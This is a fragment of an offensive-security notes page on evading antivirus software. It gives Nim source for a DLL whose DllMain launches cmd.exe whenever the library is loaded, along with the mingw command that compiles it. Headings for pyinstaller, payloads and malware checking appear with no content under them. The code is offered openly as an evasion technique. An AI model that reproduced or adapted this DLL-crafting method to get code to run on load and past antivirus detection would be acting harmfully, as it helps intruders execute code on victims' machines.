AV Evading
Using DLL
Crafting
import osproc
import winim
proc NimMain() {.cdecl, importc.}
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
NimMain()
if fdwReason == DLL_PROCESS_ATTACH:
discard osproc.execProcess("cmd.exe")
return trueCompile
nim c -d=mingw --app=lib --nomain --cpu=amd64 .\file.nimExecution
Using pyinstaller
Payload
Compiling
Malware File Checking
Last updated